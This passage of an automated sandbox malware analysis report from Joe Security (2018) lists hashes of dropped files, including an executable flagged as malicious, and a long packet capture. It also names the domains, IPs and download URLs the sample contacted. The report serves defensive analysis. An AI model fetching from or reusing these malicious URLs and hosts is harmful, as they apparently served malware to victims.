MD5: SHA1: SHA-256: SHA-512: Malicious: 5D4D94EE7E06BBB0AF9584119797B23A DBB111419C704F116EFA8E72471DD83E86E49677 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A 18B7783F09E1C1454AFDA519624BC2BB2F28BA4 C:\Users\user\AppData\Local\Temp\375.exe Process: File Type: Size (bytes): 78848 Entropy (8bit): 7.485110571209677 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: Antivirus: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PE32 executable (GUI) Intel 80386 system file, for MS Windows 5CFD7D5DDCE93878D78F788EE599CD4D B437B16D20690727336D29C90B7060C95ED128DD 52B9D19F85B3DD673ACA5D7A6BF03AFD95620485EA43EA012F0254D385DA0629 DB2EF069D88AA6BA453180561BCFFDC31283BD96FE3DCD5BADD6A257B1C7E01F319A13C86E4095350738DF5423 9DE08ADC9FD7FEF9B00064E1B4464570D0C470 true Antivirus: virustotal, Detection: 24%, Browse C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Process: File Type: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE data Size (bytes): 162 Entropy (8bit): 1.7359603887346284 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: 3E7BD24815610B9CFB276BECD6CE969F 55D998570D5B808657E7C140888B339F657E15C4 0D1CF856000A144E9D320940FA37FFD38C9B45A19A149513D70A31EAD7F34593 47F506312D879F3FAF033BEF23EC3AA67E7ADD90AFD85DE82BD492FCE41D04AF8724CEF38FB7823C0E3053777E 1FA62183BAC9C51409F44D219365B94043CBC5 C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5V7KX1H03VFRMGGC1BGX.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.5683528727209537 Encrypted: Copyright Joe Security LLC 2018 Page 13 of 32

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5V7KX1H03VFRMGGC1BGX.temp MD5: SHA1: SHA-256: SHA-512: Malicious: A895AE1D73CCC0EBF29C10F878D486DE D4D464746711F1F6192AF89A1B706D1864C3C7BB FA7DA62C49E9946F6AB1F0750BE3F8803F47781BEA6B3374DBB3EC1721B6031C 0516CE81D9660C417648DC222915BC12314C46B61BDA3A821628DE6C7A87E32050ECE90FC4684D4645302545150 7758CC5A94C1C9BFFD043A60F569B8B74FAA \samr Process: File Type: Size (bytes): 116 Entropy (8bit): 4.053374040827533 Encrypted: MD5: SHA1: SHA-256: SHA-512: Malicious: C:\Program Files\Internet Explorer\iexplore.exe Hitachi SH big-endian COFF object, not stripped 080E701E8B8E2E9C68203C150AC7C6B7 4EF041621388B805758AE1D3B122F9D364705223 FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719 D892B4C0D22BB67BE0D57EAB368BA1BC057E79 Contacted Domains/Contacted IPs Contacted Domains Name IP Active Malicious Antivirus Detection Reputation shopsforclothes.uk 160.153.137.19 true 0%, virustotal, Browse unknown gezginyerler.com 94.73.145.234 true true 0%, virustotal, Browse unknown www.shopsforclothes.uk unknown unknown true 6%, virustotal, Browse unknown www.gezginyerler.com unknown unknown true 4%, virustotal, Browse unknown Contacted URLs Name http://www.gezginyerler.com/jposeirt/sk4npm/ http://www.shopsforclothes.uk/factura-adjunto/ Process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Internet Explorer\iexplore.exe Contacted IPs Copyright Joe Security LLC 2018 Page 14 of 32

No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs Public IP Country Flag ASN ASN Name Malicious 94.73.145.234 Turkey 34619 CIZGITR true 177.240.22.159 Mexico 13999 MegaCableSAdeCVMX 160.153.137.19 United States 26496 AS-26496-GO-DADDY-COM-LLC- GoDaddycomLLCUS Static File Info No static file info Network Behavior Network Port Distribution Total Packets: 147 443 (HTTPS) 80 (HTTP) 53 (DNS) Copyright Joe Security LLC 2018 Page 15 of 32

TCP Packets Timestamp Port Dest Port IP Dest IP Jul 11, 2018 20:07:46.606309891 CEST 63758 53 192.168.2.3 8.8.8.8 Jul 11, 2018 20:07:46.652992010 CEST 53 63758 8.8.8.8 192.168.2.3 Jul 11, 2018 20:07:46.669075012 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.669820070 CEST 49171 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.694473028 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.694564104 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.695220947 CEST 80 49171 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.695316076 CEST 49171 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.698333025 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.728640079 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.728677988 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.728770971 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.728780031 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.728934050 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.728960991 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.728986025 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.729007006 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.729008913 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.729031086 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.729091883 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.729094028 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.729254007 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.729306936 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755141973 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755229950 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755284071 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755389929 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755419970 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755445957 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755462885 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755470037 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755486965 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755496979 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755548000 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755574942 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755600929 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755604982 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755626917 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755650997 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755681038 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.755877972 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755903959 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.755928040 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.772288084 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.780630112 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.780719042 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.780767918 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.780880928 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.780905008 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.780952930 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781044006 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781069040 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781090975 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781091928 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781112909 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781174898 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781203032 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781225920 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781248093 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781248093 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781270027 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781291962 CEST 80 49170 160.153.137.19 192.168.2.3 Copyright Joe Security LLC 2018 Page 16 of 32

Timestamp Port Dest Port IP Dest IP Jul 11, 2018 20:07:46.781321049 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781361103 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781383991 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781405926 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781524897 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781567097 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781698942 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781745911 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.781848907 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.781892061 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.797950983 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.798110008 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806324959 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806416035 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806447029 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806576967 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806603909 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806627035 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806643963 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806651115 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806674004 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806694031 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806731939 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806746006 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806756020 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806780100 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806802988 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806804895 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806826115 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806849003 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806870937 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806888103 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806894064 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806916952 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806938887 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806962013 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.806967974 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.806984901 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807007074 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807029963 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.807053089 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807092905 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.807224035 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807302952 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.807387114 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807411909 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807435036 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807435989 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.807544947 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.807601929 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.823538065 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.823622942 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.823640108 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.823681116 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.831806898 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.831841946 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.831963062 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832057953 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832079887 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832099915 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832112074 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832218885 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832293034 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832545042 CEST 80 49170 160.153.137.19 192.168.2.3 Copyright Joe Security LLC 2018 Page 17 of 32

Timestamp Port Dest Port IP Dest IP Jul 11, 2018 20:07:46.832566023 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832587957 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832595110 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832607985 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832628012 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832663059 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832701921 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832756042 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832865953 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832886934 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832906961 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832914114 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.832925081 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.832972050 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:46.849235058 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:46.849463940 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.100712061 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.100876093 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.118386984 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.143734932 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.143774986 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.143902063 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.143913984 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.143940926 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.143963099 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.143981934 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144001961 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144040108 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.144121885 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144143105 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144160986 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144181013 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144201040 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144208908 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.144280910 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144303083 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144321918 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144340992 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144376040 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.144435883 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.144507885 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.169836998 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.169909954 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.169926882 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.169941902 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.169955015 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.169970989 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.169986010 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170048952 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.170073032 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170090914 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170106888 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170120955 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170136929 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170151949 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170166016 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170181036 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170183897 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.170233011 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170329094 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.170403004 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170419931 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170434952 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170449972 CEST 80 49170 160.153.137.19 192.168.2.3 Copyright Joe Security LLC 2018 Page 18 of 32

Timestamp Port Dest Port IP Dest IP Jul 11, 2018 20:07:47.170460939 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.170464993 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170480013 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.170546055 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.195513010 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195590019 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195609093 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195627928 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195645094 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195663929 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195667982 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.195681095 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195698977 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195749044 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195869923 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.195907116 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.195972919 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196086884 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196105003 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196121931 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196139097 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196156025 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196160078 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196172953 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196190119 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196217060 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196234941 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196252108 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196269035 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196284056 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196285009 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196302891 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196305037 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196319103 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196327925 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196343899 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196362019 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196553946 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196670055 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196698904 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196717978 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196727991 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196737051 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196747065 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.196753979 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.196885109 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.221138000 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.221183062 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.221330881 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.221930027 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222064018 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.222079039 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222104073 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222126961 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222192049 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.222244978 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222270012 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222294092 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222316980 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.222325087 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222348928 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222398996 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222419024 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222438097 CEST 80 49170 160.153.137.19 192.168.2.3 Copyright Joe Security LLC 2018 Page 19 of 32

Timestamp Port Dest Port IP Dest IP Jul 11, 2018 20:07:47.222457886 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222564936 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222584963 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222596884 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.222605944 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222625971 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222724915 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222745895 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222764969 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.222784996 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.223372936 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.223534107 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.223553896 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.223575115 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.223594904 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.223614931 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.226577044 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.226658106 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.226674080 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.226696968 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.226716995 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.226736069 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.247054100 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.247168064 CEST 49170 80 192.168.2.3 160.153.137.19 Jul 11, 2018 20:07:47.247569084 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 2018 20:07:47.247596979 CEST 80 49170 160.153.137.19 192.168.2.3 Jul 11, 